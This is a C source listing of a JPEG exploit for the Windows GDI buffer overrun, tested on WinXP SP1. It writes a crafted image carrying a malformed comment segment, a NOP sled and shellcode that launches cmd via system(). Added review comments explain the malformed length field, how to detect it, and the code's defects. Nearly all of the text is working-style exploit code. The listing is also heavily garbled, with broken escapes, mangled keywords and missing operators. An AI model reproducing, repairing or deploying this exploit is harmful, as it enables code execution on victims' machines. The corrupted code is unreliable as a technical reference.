// GDI Buffer Overrun Exploit by Fotoz
// Nb: The Headers Here Aren't Sample Headers Taken from a .jpg file,
// with the ff fe 00 01 INSERTED in Header1.
// Sample shellcode is provided.
// You can put approx. 2500 bytes of shellcode ... who needs that much anyway?
// Tested on an unpatched WinXP SP1.
#include
#include
// NOTE(review): as rendered, this listing is not compilable C. Keywords and
// identifiers are case-mangled (`Char`, `File`, `Printf`, `FOPEN`), the two
// `#include` lines above lost their header names, and every "/ xNN" is a
// garbled "\xNN" escape. The byte arrays below are therefore treated as
// opaque data in this review; nothing has been re-encoded or repaired.
//
// Payload bytes. Per the author's inline comments the sequence pushes "cmd",
// takes its stack address and calls through the hard-coded absolute address
// 0x77C28044 (stated to be system() on WinXP SP1). The hard-coded address
// ties it to that exact OS/service-pack build.
Char shellcode [] =
"/ x68" // push
"cmd"
"/ x8b / xc4" // MOV EAX, ESP
"/ x50" // push eax
"/ xb8 / x44 / x80 / xc2 / x77" // MOV EAX, 77C28044H (Address of System () on WinXP SP1)
"/ XFF / XD0" // Call EAX
;
// Leading JPEG bytes written before everything else (see the fputc loop in
// main). The author's note at the top says "ff fe 00 01" was inserted here;
// it is visible on the fourth string line ("/ xff / xfe / x00 / x01").
// In the JPEG format FF FE introduces a COM (comment) segment and the two
// bytes that follow are the segment length, which by definition includes the
// two length bytes themselves and so can never validly be smaller than 2.
// A declared length of 0x0001 is exactly the malformed value a decoder must
// reject before using it in size arithmetic; from a detection standpoint,
// a COM/APPn segment whose length field is below 2 is the anomaly to flag.
// NOTE(review): the remaining bytes are not decoded here; case-mangling on
// several lines means they cannot be read back reliably from this page.
Char Header1 [] =
"/ XFF / XD8 / XFF / XE0 / X00 / X10 / X46 / X00 / X01 / X02 / X00 / X00 / X64"
"/ x00 / x64 / x00 / x00 / x44 / x75 / x63 / x6b / x79 / x00 / x01 / x00"
"/ X04 / X00 / X00 / X00 / X0A / X00 / X00 / XFF / XEE / X00 / X0E / X41 / X64 / X6F / X62 / X65"
"/ x00 / x64 / xc0 / x00 / x00 / x00 / x01 / xff / xfe / x00 / x01 / x00 / x14 / x10 / x10 / x19"
"/ x12 / x19 / x27 / x17 / x17 / x27 / x32 / x26 / x32 / xdc / xb1 / xe7 / x70 / x26"
"/ x2e / x3e / x35 / x35 / x35 / x35 / x35 / x3e";
// Raw opcode bytes written immediately after Header1. The name, the visible
// 0x90 byte on the second line and the author's later comment ("stuff in a
// couple of nops") suggest a small routine that fills memory with NOPs;
// it is not decoded here. NOTE(review): treat as opaque data — the escapes
// are garbled as everywhere else in this listing.
Char setnops1 [] =
"/ XE8 / X00 / X00 / X00 / X00 / X5B / X8D / X8B"
"/ x00 / x05 / x00 / x00 / x83 / xc3 / x12 / xc6 / x03 / x90 / x43 / x3b / xd9 / x75 / xf8";
// Second copy of the routine above, written near the end of the file (see
// the last fputc loop in main). The only visible differences from setnops1
// are a leading 0x3E byte and the constant 0x2f 0x00 0x00 0x00 in place of
// 0x00 0x05 0x00 0x00. Not decoded here; treat as opaque data.
Char setnops2 [] =
"/ X3E / XE8 / X00 / X00 / X00 / X00 / X5B / X8D / X8B"
"/ x2f / x00 / x00 / x00 / x83 / xc3 / x12 / xc6 / x03 / x90 / x43 / x3b / xd9 / x75 / xf8";
// Remaining JPEG data written after setnops1 and before the NOP fill and the
// payload. Byte data only; not decoded here.
// NOTE(review): this array cannot be reconstructed from this page. The
// string-literal quoting is broken in the rendering (a stray `"` on the line
// ending `/ X44 "`, on the line ending `/ X01" "`, and on the final line),
// and at least three escapes are unrecoverable ("/ x4", "/ x-x82",
// "/ x 44"). It is kept byte-for-byte as found.
Char Header2 [] =
"/ x44"
"/ x44 / x44 / x44 / x44 / x44 / x44 / x44 / x44 / x44 / x01 / x15 / x19 / x19"
"/ x20 / x1c / x20 / x26 / x18 / x26 / x20 / x26 / x36 / x44 / x36 / x2b / x2b"
"/ x36 / x44 / x35 / x42 / x44 / x44 / x44 / x44 / x44 / x44" "/ x44 / x44 / x44 / x44 / x44 / x44 / x44 / X44 / X44 / X44 / X44 / X44 / X44 / X44 / X44 / X44 "
"/ x44 / x44 / x44 / x44 / x44 / x44 / x44 / x44 / x44 / x44 / x44 / x44 / x44 / xff / xc0 / x00"
"/ X11 / X08 / X03 / X03 / X01 / X22 / X00 / X02 / X11 / X01" "
"/ XFF / XC4 / X00 / XA2 / X00 / X00 / X01 / X00 / X00 / X00 / X00 / X00 / X00"
"/ X00 / X00 / X00 / X00 / X00 / X03 / X05 / X00 / X06 / X01 / X01 / X01 / X01"
"/ x01 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x01 / x00 / x02"
"/ X03 / X02 / X02 / X04 / X05 / X02 / X03 / X06 / X04 / X05 / X02 / X06 / X01"
"/ x05 / x01 / x00 / x11 / x21 / x31 / x12 / x04 / x41 / x51 / x22 / x13 / x05"
"/ x61 / x32 / x91 / xa1 / xc1 / x52 / x23 / x14 / xb1 / xd1 / x62 / x15 / xf0"
"/ XE1 / X72 / X24 / X06 / X82 / X24 / XF1 / X92 / X43 / X53 / X34 / X16 / XA2 / XD2 / X63 / X83"
"/ X44 / X54 / X02 / X01 / X03 / X02 / X04 / X03 / X08 / X03 / X00 / X02 / X03"
"/ x01 / x00 / x00 / x00 / x00 / x01 / x41 / x12 / xf0 / x51 / x61 / x71"
"/ X81 / XD1 / XE1 / XF1 / X22 / X32 / X42 / X52 / XC1 / X62 / X13 / X72 / X92"
"/ XD2 / X03 / X23 / X82 / XFF / XDA / X00 / X0C / X03 / X01 / X00 / X02 / X11 / X03 / X11 / X00"
"/ X3F / X00 / X0F / X90 / XFF / X00 / XBC / XDA / XB3 / X36 / X12 / XC3 / XD4 / XAD / XC6 / XDC"
"/ X45 / X2F / XB2 / X97 / XB8 / X9D / XCB / X63 / XFD / X26 / XD4 / XC6 / XD7 / X70 / XA4 / X19"
"/ X24 / X50 / XCA / X46 / X2B / XFC / XEB / X3B / XC7 / XC9 / XA5 / X4A / X8F / X69 / X26 / XDF"
"/ X6D / X72 / X4A / X9E / X27 / X6B / X3E / XE6 / X92 / X86 / X24 / X85 / X04 / XDB / XED / XA9"
"/ x64 / x8e / x19 / x1a / xa5 / xe7 / xb8 / x28 / x3d / x09 / xab / x5d / x5f"
"/ x16 / x4 / x4c / xed / x49 / x4c / xf5 / x01 / x1c / x49 / xab / x10 / x71"
"/ xa6 / x24 / x61 / x00 / x0f / x61 / xec / x34 / xa7 / x9c / x23 / xf4 / x96"
"/ XC6 / XE6 / XAF / XB7 / X80 / X76 / XEF / X93 / XF0 / XAA / X28 / X8A / X6B / XE0 / X18 / XC0"
"/ xa4 / x39 / x03 / xc2 / x90 / xdc / x43 / x31 / x91 / x23" "/ x35 / x35 / xa2 / x80 / x4d / xfa / x72 / X31 / X07 / X9D / X03 / X70 / XA8 / X93 / X24 / X4F "
"/ x89 / x51 / x83 / x5e / xa4 / x2e / x7a / xc0 / x7d / xa9 / x8a / x10 / x61 / x64 / x07 / xfa"
"/ x88 / xc6 / x89 / x26 / xda / x0f / x20 / xbd / xb9 / x16 / xd2 / xa8 / XE8 / X91 / x3f / x1a"
"/ XE2 / XBA / XF0 / XBE / X74 / XAb / X1D / XC4 / X44 / X15 / X1A / X8A / X9C / XC7 / X2A / X6B"
"/ xa3 / x33 / x47 / x69 / xa9 / x64 / x68 / x26 / xc1 / x97 / x0b / xd6 / x86"
"/ X8B / X1B / X29 / XC6 / X87 / XE4 / XC7 / XFD / XCC / X53 / X11 / XA5 / X9C / X62 / X6A / XE5"
"/ x40 / x37 / x61 / x89 / xf6 / xb2 / x9c / x2a / x7c / xfd / x05 / x6a / x30 / x5f / x52 / x02"
"/ XEB / X72 / XBF / X7D / X74 / X4C / X23 / XB9 / X8F / XD8 / X78 / X67 / X54 / X59 / X64 / X47"
"/ XC5 / X75 / X21 / X18 / XD5 / XE3 / X58 / XE1 / X72 / X63 / XBF / X6D / XBD / XCB / XCA / X82"
"/ x65 / x54 / x4f / x0d / x95 / x86 / x76 / x-x82 / x55"
"/ XD7 / XA6 / XCE / XA7 / XAA / XDC / X6A / XF1 / XA9 / X8E / XE0 / X35 / XC1 / XCA / XA1 / XD4"
"/ x93 / xd2 / xd6 / x39 / x46 / x60 / xac / xc1 / x3b / x60 / xc9 / x70 / x84"
"/ X8E / XA1 / X9A / X9A / X20 / X01 / X94 / XCA / X08 / X91 / X53 / XDC / X01 / XB1 / XB5 / X12"
"/ x37 / x11 / xc6 / xc1 / xac / xf1 / x11 / xd4 / x9c / x6b / x3e / x69 / x76 / xf0 / x1d / x7b"
"/ x52 / x6d / xc9 / xa8 / x66 / x94 / xbb / x79 / x8f / x7e / xde / x17 / xfd / x4d / xab / x1e"
"/ X76 / X7A / Xa3 / X2B / XE2 / X50 / X06 / XB7 / X2C / XEB / X2A / X49 / XC9 / XEA / X4E / X9B"
"/ XE7 / XCA / XAF / X1E / XEC / X23 / XDC / X8B / XE1 / X6B / X5F / X1A / X9B / XE8 / X49 / X2E"
"/ X63 / XE5 / X03 / X32 / XCD / X19 / XB8 / X23 / X10 / X78 / X1F / X85 / X5C / X15 / X8C / X97"
"/ X84 / X9B / XDB / X15 / X35 / X9F / X16 / XE0 / X1E / X86 / XB9 / X8F / X97 / X11 / X4E / XDA"
"/ x35 / x02 / x45 / x25 / x93 / x17 / xb9 / x1b / xf5 / xc8 / x07 / xa9 / xe2"
"/ X2A / X76 / X01 / X95 / XAD / X81 / XB6 / X1C / X6A / XA2 / X38 / XD9 / XAE"
"/ XCA / X59 / X18 / X75 / X25 / XFF / X00 / X81 / XAE / XD8 / XE8 / XBB / X47 / X62 / XAC / XB7"
"/ xb6 / xa1 / x8d / x40 / x6d / x1e / xdb / x89 / x2f / x9d / xcd / x6b / x24" "/ x62 / x41 / x61 / x89 / xac / x2d / x8b / X3E / XB6 / X68 / XC0 / X63 / X73 / X70 / X6B / X6B "
"/ X6A / Xa1 / X7A / XAC / X56 / XE7 / X11 / X56 / X58 / XD4 / X13 / XA4 / X0B / XB6 / XEB / XB3"
"/ X3B / X47 / X22 / X3B / XD3 / X53 / X2E / XEA / X19 / X86 / X96 / XF7 / X03 / X83 / X52 / X9E"
"/ X54 / XAb / X7E / X33 / XCE / X93 / XB1 / X19 / X1C / XE9 / XDB / XAA / X35"
"/ xbf / x46 / x8d / xd4 / xd2 / x56 / xe0 / xe0 / x33 / xa1 / x4d / x0a / x4e / x3b / xb1 / xcd"
"/ xd4 / x06 / x 44 / x56 / x4a / xcd / x24 / x26 / xea / x6d / x7a / x87 / xdc / x3b / x60 / x6d"
"/ XFC / X2A / X36 / X1B / X97 / X04 / Xa0 / X11 / XEE / XE7 / X46 / X22 / X35"
"/ XD5 / X26 / X7C / X69 / X5F / X06 / XEC / X5A / XC5 / X0B / X46 / X70 / X27"
"/ XF2 / XD4 / X79 / XAD / X89 / XDA / X30 / X74 / XBD / X98 / XE4 / X68 / X58 / X86 / XE4 / X1B"
"/ X69 / XB9 / XDC / X2B / X30 / X87 / X48 / X53 / XC5 / X85 / X3B / XDD / X8A / X4E / XB5 / X42"
"/ XB2 / X8C / X6E / X2C / X01 / XF8 / X56 / X04 / X7B / XC9 / XA3 / X05 / X4F / XB4 / XD5 / XA2"
"/ XDF / XF6 / XFD / XC6 / XE2 / XA7 / X3C / X89 / X24 / XFE / XA9 / X5E / XC3 / XD4 / X6D / XF7"
"/ x85 / xc9 / x59 / x39 / x63 / x59 / x9b / xff / x00 / x06 / x1a / x5e / xfa / x69 / x0a / x46"
"/ X2B / XC0 / X9F / XC2 / X91 / X8B / XC9 / X40 / X58 / X16 / XBD / XF2 / XC0 / XD3 / X3B / X7F"
"/ x2d / xa9 / xbb / x2e / x49 / x42 / x6d / x52 / x70 / x39 / x62 / x9f / x08 / x73 / x6f / x20"
"/ x09 / x64 / x00 / x00 / xd5 / x97 / xbc / xdc / xf6 / x9c / xa7 / x66 / XEA"
"/ XD9 / XB6 / XDE / XE1 / XDE / XDE / XBA / XEC / X65 / XB4 / X44 / XD8 / XE3 / X8D / X52 / X2F"
"/ X36 / XCE / X74 / X33 / X7E / X9F / X2E / X22 / X99 / X8B / XC9 / X6D / X5A / X6D / X9E / XA8"
"/ X22 / XC7 / X0C / XA8 / X62 / X3D / X17 / X1D / X2F / XC8 / XFA / XD4 / XB0 / X9E / X14 / X45"
"/ X45 / X04 / XE1 / X96 / X04 / XE1 / XF1 / XA0 / X37 / X90 / X5B / XD8 / X7F / X81 / X57 / X1B"
"/ XC8 / XD5 / X48 / X27 / X0E / X3C / X6B / X3D / XCD / X44 / X15 / X92 / X41 / X25 / X94 / X82"
"/ XAE / X0E / X42 / X97 / X8D / X8C / X6D / XAE / X56 / XB8 / X26 / XD8 / X0F / XE3 / X43 / X93"
"/ X73 / X18 / X75 / X28 / XD7 / XF8 / XD5 / XFF / X00 / X74 / XE4 / X18 / XC2 / X82 / XAC / X6F" / X86 / X7F / X2A / X4C / XBE / XE5 / XFC / XD2 / X22 / XCC / X9A / X32 / XD1 / X7C / X7D / X68 ""
;
// Entry point: writes the crafted image to disk. Observable behaviour from
// the surviving text:
//   1. creates a directory and opens one output file in binary mode; on
//      open failure prints a message and returns;
//   2. prints the payload size (sizeof - 1, i.e. without the string NUL);
//   3. scans the payload for the byte pair FF D9 and aborts if found —
//      0xD9FF read as a little-endian unsigned short is FF D9 in file
//      order, which is the JPEG EOI marker the program itself appends last
//      via fprintf("/ xff / xd9"), so an early occurrence would truncate
//      the image;
//   4. emits, in order: Header1, setnops1, Header2, 0x90 fill up to offset
//      0x63c, the payload, 0x90 fill up to just under 0x1000, setnops2,
//      then the EOI marker; the output is therefore about 0x1000 + 2 bytes.
// NOTE(review): the `<`, `+` and `++` operators of most loop headers are
// missing from this rendering (only `i <0x63c` and `i <0x1000...` survive),
// so the exact bounds in step 4 are inferred, not read. Two fputc calls
// (Header1, Header2) also lack their closing parenthesis as shown.
// NOTE(review): code-quality points a maintainer would flag — `void main()`
// is non-standard; the FF D9 scan type-puns a char array through an
// `unsigned short *` (alignment/aliasing; memcpy is the portable form) and
// reads one byte past the array on the last iteration; `fcloseall()` is a
// CRT extension; `fin` is declared but never used; the mkdir name
// ("Fotoz_JPEG") and the path component ("Fotoz_jpeg") differ in case and
// the `//` in the path is presumably a garbled `\\`.
void main ()
{
File * fin, * fout;
Unsigned int i = 0, j = 0;
UNSIGNED CHAR C;
Mkdir ("Fotoz_JPEG");
Fout = FOPEN ("Fotoz_jpeg // Fotoz.jpg", "WB");
IF (! fout) {
Printf ("Error Opening Files / N);
Return;
}
Printf ("Shellcode Size IS% U Bytes / N", SIZEOF (Shellcode) -1);
// The whole loop/emit sequence below was collapsed onto one line by the
// rendering; see the numbered summary above for what it does.
For (i = 0; i IF (0xD9FF == * (unsigned short *) & shellcode [i]) { Printf ("Warning: Shellcode Contains Ffh D9H / N" "FIX UR shellcode / n"); Return; } J = sizeof (header1) sizeof (setnops1) sizeof (header2) -3; For (i = 0; i FPUTC (Header1 [i], fout; For (i = 0; I FPUTC (SetNOPS1 [I], Fout); For (i = 0; i FPUTC (Header2 [i], fout; For (i = j; i <0x63c; i ) FPUTC (0x90, fout); // stuff in a couple of nops J = I; For (i = 0; i FPUTC (Shellcode [i], fout); For (i = i j; i <0x1000-sizeof (setnops2) 1; i ) FPUTC (0x90, fout); // stuff NOPS // (stuffing nops is becoming a bad habit) For (j = 0; i <0x1000 && j FPUTC (SetNOPS2 [J], Fout); FPrintf (fout, "/ xff / xd9"); Fcloseall (); }